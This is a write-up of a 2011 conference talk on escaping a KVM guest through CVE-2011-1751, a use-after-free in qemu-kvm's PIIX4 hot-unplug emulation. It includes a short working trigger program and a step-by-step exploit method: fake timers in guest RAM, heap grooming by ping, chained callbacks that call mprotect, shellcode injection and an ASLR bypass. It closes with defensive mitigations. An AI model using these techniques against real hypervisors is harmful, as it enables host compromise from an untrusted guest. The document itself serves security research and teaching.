Virtunoid: Breaking out of KVM

Report
Nelson Elhage
Black Hat USA 2011
 Introduction
 Related work
 Background Knowledge
 Attack Details
    CVE-2011-1751 Bug Details
    Exploit Details (Take Control of %rip)
    Inject Shellcode into the Host
    Disable Non-executable Pages
    Bypassing ASLR
 Conclusions
 References
 It was found that the PIIX4 Power Management
emulation layer in qemu-kvm did not properly check
for hot plug eligibility during device removals. A
privileged guest user could use this flaw to crash the
guest or, possibly, execute arbitrary code on the host.
(CVE-2011-1751)
 QEMU: a generic and open source machine emulator and virtualizer.
 KVM has three components:
    kvm.ko
    kvm-intel.ko or kvm-amd.ko
    qemu-kvm
kvm.ko
 The core KVM kernel module
 Provides ioctls for communicating with the kernel module
 Primarily responsible for emulating the virtual CPU and MMU
 Emulates a few devices in-kernel for efficiency
 Contains an emulator for a subset of x86 used in handling certain traps
kvm-intel.ko / kvm-amd.ko
 Provide support for Intel’s VMX and AMD’s SVM virtualization extensions
 Relatively small compared to the rest of KVM
qemu-kvm
 Provides the most direct user interface to KVM
 Based on the classic QEMU emulator
 Implements the bulk of the virtual devices a VM uses
 Implements a wide variety of possible devices and buses
 An order of magnitude more code than the kernel module
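QEMUTimer
 Active timers are kept in one linked list per clock:
static QEMUTimer *active_timers[QEMU_NUM_CLOCKS];
struct QEMUTimer {
    QEMUClock *clock;
    int64_t expire_time;
    QEMUTimerCB *cb;         /* callback function */
    void *opaque;            /* argument passed to cb */
    struct QEMUTimer *next;  /* next timer in the linked list */
};
[Figure: active_timers pointing to a linked list of QEMUTimer structures.]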
 Related functions:
    qemu_new_timer: allocates memory for a new timer.
    qemu_mod_timer: modifies the timer's expire time and adds it to the linked list.
    qemu_run_timers: walks the linked list and calls the callback of each expired timer with opaque as the argument.
 The main_loop_wait function iterates through active_timers and calls qemu_run_timers().
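The timer mechanism described above can be modelled in a few lines of C. This is a simplified sketch, not the QEMU implementation: the names Timer, timer_mod, timers_run and count_cb are hypothetical, the clock field is left out, and the list is kept sorted by expire time as an assumption.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for QEMUTimer; the clock field is omitted. */
typedef void TimerCB(void *opaque);

typedef struct Timer {
    int64_t expire_time;
    TimerCB *cb;          /* callback function */
    void *opaque;         /* argument passed to cb */
    struct Timer *next;   /* next timer in the list */
} Timer;

/* Unlink t from the list if it is currently on it. */
static void timer_del(Timer **head, Timer *t)
{
    for (Timer **pt = head; *pt != NULL; pt = &(*pt)->next) {
        if (*pt == t) {
            *pt = t->next;
            break;
        }
    }
}

/* Set a new expire time and (re)insert t, keeping the list sorted. */
static void timer_mod(Timer **head, Timer *t, int64_t expire_time)
{
    timer_del(head, t);
    t->expire_time = expire_time;
    Timer **pt = head;
    while (*pt != NULL && (*pt)->expire_time <= expire_time) {
        pt = &(*pt)->next;
    }
    t->next = *pt;
    *pt = t;
}

/* Pop every timer that has expired at time now and call its callback.
 * Returns the number of callbacks that were invoked. */
static int timers_run(Timer **head, int64_t now)
{
    int fired = 0;
    while (*head != NULL && (*head)->expire_time <= now) {
        Timer *t = *head;
        *head = t->next;
        t->next = NULL;
        t->cb(t->opaque);   /* cb and opaque are trusted blindly */
        fired++;
    }
    return fired;
}

/* Example callback: treats opaque as an int counter and increments it. */
static void count_cb(void *opaque)
{
    (*(int *)opaque)++;
}
```

The point relevant to the attack is the line that calls t->cb(t->opaque): whoever controls the contents of a timer on the list controls both the function that is called and its first argument.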
RTC (real-time clock)
 A computer clock that keeps track of the current time
 The MC146818 RTC hardware manual can be found at
    http://wiki.qemu.org/File:MC146818AS.pdf
 RTCState structure:
struct RTCState {
    ...
    QEMUTimer *second_timer;
    QEMUTimer *second_timer2;
};
 Related functions:
    rtc_initfn: initializes the RTC.
    rtc_update_second: updates the expire time of the QEMUTimer and adds it to the linked list.
 rtc_initfn:
RTCState *s = ...;
s->second_timer = qemu_new_timer(rtc_clock, rtc_update_second, s);
s->second_timer2 = qemu_new_timer(rtc_clock, rtc_update_second2, s);
qemu_mod_timer(s->second_timer2, s->next_second_time);
[Figure: active_timers points to a linked list of QEMUTimer structures. The RTCState fields second_timer and second_timer2 point to two QEMUTimer entries whose cb fields are rtc_update_second and rtc_update_second2 and whose opaque fields point back to the RTCState.]
PIIX4
 A south bridge chip.
 The default south bridge chip used by qemu-kvm.
 Includes ACPI, a PCI-ISA bridge, and an embedded MC146818 RTC.
 Supports PCI device hotplug, controlled by writing values to I/O port 0xae08.
 QEMU uses qdev_free to emulate device hot-unplug.
 Certain devices don’t support hotplug, but QEMU did not check this.
 It should not be possible to unplug the ISA bridge.
 KVM’s emulated RTC is not designed to be unplugged.
[Code figure annotations: QEMU did not check whether the device can be unplugged or not; the RTCState is deallocated; the second timer is still added to the linked list.]
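The missing eligibility check can be illustrated with a small model. This is a sketch under stated assumptions, not QEMU code: Device, no_hotplug, lowest_set_bit and eject are hypothetical names, and the written value is assumed to be a bitmask in which the lowest set bit selects the slot (so the value 2 selects slot 1).

```c
#include <stdbool.h>
#include <stddef.h>

#define NUM_SLOTS 32

/* Hypothetical, simplified PCI device record. */
typedef struct Device {
    const char *name;
    bool present;
    bool no_hotplug;   /* set for devices that must never be removed */
} Device;

/* Index of the lowest set bit in val, or -1 if val is 0. */
static int lowest_set_bit(unsigned val)
{
    for (int i = 0; i < NUM_SLOTS; i++) {
        if (val & (1u << i)) {
            return i;
        }
    }
    return -1;
}

/* Eject handler. With check == false it removes whatever sits in the
 * slot (the buggy behaviour); with check == true it refuses devices
 * that are not eligible for hot-unplug. Returns true if a device was
 * removed. */
static bool eject(Device *slots, unsigned val, bool check)
{
    int slot = lowest_set_bit(val);
    if (slot < 0 || !slots[slot].present) {
        return false;
    }
    if (check && slots[slot].no_hotplug) {
        return false;
    }
    slots[slot].present = false;   /* stands in for freeing the device */
    return true;
}
```

With an ISA bridge marked no_hotplug in slot 1, eject(slots, 2, true) leaves it in place, while eject(slots, 2, false) removes it together with everything embedded in it.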
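#include <sys/io.h>

int main(void)
{
    iopl(3);           /* allow access to all I/O ports (needs root in the guest) */
    outl(2, 0xae08);   /* request ejection of PCI slot 1, the ISA bridge */
    return 0;
}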
Unplug RTC
[Figure: before the unplug, active_timers links to a QEMUTimer whose cb is rtc_update_second and whose opaque points to the RTCState; the RTCState's second_timer field points to a QEMUTimer.]
[Figure: after the unplug, the RTCState has been freed and is shown as a dummy memory region, but the QEMUTimer that references it is still on the active_timers list.]
Return to main_loop_wait, which calls qemu_run_timers
QEMUTimer callback: rtc_update_second(opaque)
Next main_loop_wait
[Figures: the same layout repeated for each step; the callback runs with opaque pointing into the dummy memory region.]
 1. Inject a controlled QEMUTimer into qemu-kvm.
 2. Eject the ISA bridge.
 3. Force an allocation into the freed RTCState, with second_timer pointing to our fake QEMUTimer.
 The guest RAM is backed by an mmap()ed region inside the qemu-kvm process.
 Allocate the fake QEMUTimer in guest RAM and calculate its host address with the following formulas:
    hva = physmem_base + gpa
    gpa = page_translation(gva)   (the page translation from Linux kernel project 1)
 where
    gva = guest virtual address
    gpa = guest physical address
    hva = host virtual address
    physmem_base = start of the mmap()ed region
 For now, assume we know physmem_base (no ASLR).
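The two formulas can be sketched as follows. The source does not say how page_translation is performed; this sketch assumes a Linux guest in which a privileged process reads its own /proc/self/pagemap, where each page has a 64-bit entry with bit 63 marking a present page and bits 0 to 54 holding the page frame number. The function names and the 4 KiB page size are assumptions of the sketch.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  (1ULL << PAGE_SHIFT)

/* Assumed layout of one 64-bit /proc/self/pagemap entry. */
#define PM_PRESENT  (1ULL << 63)
#define PM_PFN_MASK ((1ULL << 55) - 1)

/* gpa = page_translation(gva): combine the page frame number from the
 * pagemap entry with the offset of gva inside its page.
 * Returns false if the page is not present in guest RAM. */
static bool pagemap_to_gpa(uint64_t entry, uint64_t gva, uint64_t *gpa)
{
    if (!(entry & PM_PRESENT)) {
        return false;
    }
    uint64_t pfn = entry & PM_PFN_MASK;
    *gpa = (pfn << PAGE_SHIFT) | (gva & (PAGE_SIZE - 1));
    return true;
}

/* hva = physmem_base + gpa */
static uint64_t gpa_to_hva(uint64_t physmem_base, uint64_t gpa)
{
    return physmem_base + gpa;
}
```

In such a guest, the entry for a given gva would be the 8 bytes at file offset (gva / PAGE_SIZE) * 8 in /proc/self/pagemap, and the page should be touched and locked first so that it stays present.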
 Force QEMU to call malloc
 Use the qemu-kvm user-mode networking stack
 qemu-kvm implements a DHCP server, a DNS server and a NAT gateway in its user-mode networking stack
 The user-mode stack normally handles packets synchronously
 To prevent recursion, if a second packet is emitted while a first packet is being handled, the second packet is queued using malloc
 An ICMP ping to the emulated gateway triggers this path
 1. Allocate a fake QEMUTimer.
 2. Calculate the fake timer's host address.
 3. Unplug the ISA bridge.
 4. Ping the gateway with packets containing pointers to your fake timer.
Allocate fake QEMUTimer
[Figure: a fake QEMUTimer whose cb points to the evil function (shellcode) is prepared next to the legitimate structures: active_timers, the QEMUTimer with cb = rtc_update_second, and the RTCState with its second_timer field.]
Unplug ISA bridge
Ping the gateway
[Figure: the freed RTCState is filled with attacker data so that second_timer points to the fake QEMUTimer.]
First main_loop_wait
[Figure: the stale QEMUTimer with cb = rtc_update_second is still on the active_timers list.]
Second main_loop_wait
[Figure: the fake QEMUTimer is now on the active_timers list, so its cb, the evil function (shellcode), is called.]
 1. We have %rip control.
 2. Where is the evil function?
    Inject shellcode into host virtual memory.
    Host virtual memory has page protection (NX bit).
 3. Solutions:
    A. ROP
    B. Something clever
 1. We can control the QEMUTimer data structure.
 2. Create multiple QEMUTimer objects and chain them together.
[Figure: a chain of three QEMUTimer structures linked through their next fields; their callbacks invoke F1(X), F2(Y) and F3(Z).]
 We now have multiple one-argument function calls.
 We want function calls with more arguments. For example, mprotect takes three arguments.
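The chaining idea can be modelled as below. This is an illustrative sketch only: FakeTimer, run_chain, f1, f2, f3 and the trace buffer are hypothetical, and the expire-time check of the real timer loop is left out on the assumption that every fake timer is already expired.

```c
#include <stddef.h>

/* Minimal stand-in for an attacker-built QEMUTimer. */
typedef struct FakeTimer {
    void (*cb)(void *opaque);
    void *opaque;
    struct FakeTimer *next;
} FakeTimer;

/* Records which function ran with which argument, e.g. "1X2Y3Z". */
static char trace[32];
static size_t trace_len;

static void log_call(char fn, const char *arg)
{
    if (trace_len + 2 < sizeof trace) {
        trace[trace_len++] = fn;
        trace[trace_len++] = arg[0];
        trace[trace_len] = '\0';
    }
}

/* Three one-argument functions standing in for F1, F2 and F3. */
static void f1(void *opaque) { log_call('1', opaque); }
static void f2(void *opaque) { log_call('2', opaque); }
static void f3(void *opaque) { log_call('3', opaque); }

/* Walk the chain the way a timer loop would: one call per entry,
 * each with its own opaque as the only argument. */
static void run_chain(FakeTimer *head)
{
    FakeTimer *t = head;
    while (t != NULL) {
        FakeTimer *next = t->next;
        t->cb(t->opaque);
        t = next;
    }
}
```

Linking three entries with opaque values "X", "Y" and "Z" and calling run_chain on the first one leaves "1X2Y3Z" in trace, that is F1(X), F2(Y), F3(Z) in order.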
 Arguments of types _Bool, char, short, int, long, long long, and pointers are in the INTEGER class.
 If the class is INTEGER, the next available register of the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9 is used.
 For more details, see reference [7].
 Suppose we can find a function with the following property:
set_rsi:
    movq %rdi, %rsi
    ret
 Let F1(x) be set_rsi.
 The %rsi register is not modified during qemu_run_timers() in most QEMU versions.
 Therefore F2(y) becomes F2(y, x), since we control %rsi through F1(x).
void cpu_outl(pio_addr_t addr, uint32_t val) {
    ioport_write(2, addr, val);
}
 This function copies its first parameter into the second parameter of ioport_write.
 The first parameter is passed in %rdi and the second in %rsi, so this function has the property we need. Because addr is a 32-bit value, the copy is effectively movl %edi, %esi.
 mprotect prototype:
    mprotect(addr, len, prot)
    PROT_EXEC = 4
 Use ioport_readl_thunk(opaque, addr), which calls ioport->ops->read(ioport, addr - ioport->base, 4, &data) with ioport = opaque
 We control “opaque/ioport” through the QEMUTimer and “addr” through set_rsi()
 So we control every argument of this call
 Allocate a fake IORangeOps with
    fake_ops->read = mprotect
 Allocate a page-aligned IORange with
    fake_ioport->ops = fake_ops
    fake_ioport->base = -PAGE_SIZE
 Copy the shellcode right after the IORange
 Construct a timer chain that calls
    cpu_outl(0, *)
    ioport_readl_thunk(fake_ioport, 0)
    fake_ioport + 1
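[Figure: a QEMUTimer chain of three entries. The first has cb = cpu_outl, the second has cb = ioport_readl_thunk and opaque pointing to the page-aligned IORange, and the third points just past the IORange. The IORange's ops field points to an IORangeOps whose read field is mprotect; the rest of the page after the IORange is filled with shellcode.]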
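The argument arithmetic behind this chain can be checked with a small model. It is a sketch under assumptions: the IORange and IORangeOps layouts and the thunk body are simplified reconstructions, readl_thunk_model and record_read are hypothetical names, and a recording function stands in for mprotect so that nothing is actually remapped.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE 4096ULL

typedef struct IORange IORange;

/* Assumed, simplified layout of the ops table. */
typedef struct IORangeOps {
    void (*read)(IORange *iorange, uint64_t offset,
                 unsigned width, uint64_t *data);
} IORangeOps;

/* Assumed, simplified layout of an I/O range. */
struct IORange {
    const IORangeOps *ops;
    uint64_t base;
    uint64_t len;
};

/* Model of the thunk: forwards to ops->read with a fixed width of 4
 * and an offset of addr - base. */
static uint32_t readl_thunk_model(void *opaque, uint32_t addr)
{
    IORange *ioport = opaque;
    uint64_t data = 0;
    ioport->ops->read(ioport, addr - ioport->base, 4, &data);
    return (uint32_t)data;
}

/* Stand-in for mprotect: records the first three arguments, which in
 * the attack would be interpreted as (addr, len, prot). */
static void *seen_addr;
static uint64_t seen_len;
static unsigned seen_prot;

static void record_read(IORange *iorange, uint64_t offset,
                        unsigned width, uint64_t *data)
{
    seen_addr = iorange;
    seen_len = offset;
    seen_prot = width;
    *data = 0;
}
```

With base set to -PAGE_SIZE and addr equal to 0, the offset becomes 0 - (-PAGE_SIZE) = PAGE_SIZE, so the three leading arguments are (fake_ioport, PAGE_SIZE, 4), which reads as mprotect(fake_ioport, PAGE_SIZE, PROT_EXEC).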
 To bypass ASLR we need two addresses:
    The base address of the qemu-kvm binary, to find code addresses (such as mprotect)
    physmem_base, the address of the physical memory mapping inside the qemu-kvm process
 Solutions:
    Find an information leak
    Assume non-PIE: every major distribution compiles qemu-kvm as a non-position-independent executable
 What about physmem_base?
 fw_cfg: emulated I/O ports 0x510 (address) and 0x511 (data)
 Used to communicate various tables to the QEMU BIOS (e820 map, ACPI tables, etc.)
 Also supports exporting writable tables to the BIOS
 However, fw_cfg_write doesn’t check whether the target table is supposed to be writable
 Several fw_cfg areas are backed by statically allocated buffers
 Net result: nearly 500 writable bytes inside static variables
 mprotect needs a page-aligned address, so these bytes aren’t suitable for our shellcode
 We can construct fake timer chains in this space to build a read4() primitive (an information leak)
 Follow pointers from static variables to find physmem_base
 Proceed as before
 Sandbox qemu-kvm
 Build qemu-kvm as PIE
 Lazily mmap/mprotect guest RAM
 XOR-encode key function pointers
 More auditing and fuzzing of qemu-kvm
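The "XOR-encode key function pointers" item can be sketched as follows. This is an illustration rather than an actual QEMU patch: ptr_key, encode_cb, decode_cb and bump are hypothetical, the key is a fixed constant only to keep the example deterministic, and converting between function pointers and uintptr_t is assumed to work as it does on common POSIX platforms.

```c
#include <stdint.h>

typedef void TimerCB(void *opaque);

/* Hypothetical per-process secret. A real implementation would fill
 * this from a random source at startup instead of using a constant. */
static uintptr_t ptr_key = (uintptr_t)0x5bd1e995u;

/* Store callbacks in encoded form... */
static uintptr_t encode_cb(TimerCB *cb)
{
    return (uintptr_t)cb ^ ptr_key;
}

/* ...and decode them only at the moment of the call. */
static TimerCB *decode_cb(uintptr_t encoded)
{
    return (TimerCB *)(encoded ^ ptr_key);
}

/* Example callback: treats opaque as an int counter and increments it. */
static void bump(void *opaque)
{
    (*(int *)opaque)++;
}
```

An attacker who forges a timer without knowing ptr_key can no longer choose where the decoded pointer lands, so a plain address written into the cb field decodes to an unrelated value.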
 VM breakouts aren’t magic
 Hypervisors are just as vulnerable as anything else
 Device drivers are the weak spot.
 [1] http://qemu.weilnetz.de/qemu-tech.html
 [2] http://qemu.weilnetz.de/doxygen/structRTCState.html
 [3] http://www.linuxinsight.com/files/kvm_whitepaper.pdf
 [4] https://www.ibm.com/developerworks/cn/linux/l-virtio/
 [5] http://smilejay.com/kvm_theory_practice/
 [6] http://www.linux-kvm.org/page/Documents
 [7] http://www.cs.tufts.edu/comp/40/readings/amd64-abi.pdf
 [8] http://linuxfromscratch.xtra-net.org/hlfs/view/unstable/glibc-2.4/chapter02/pie.html
 QEMU source code
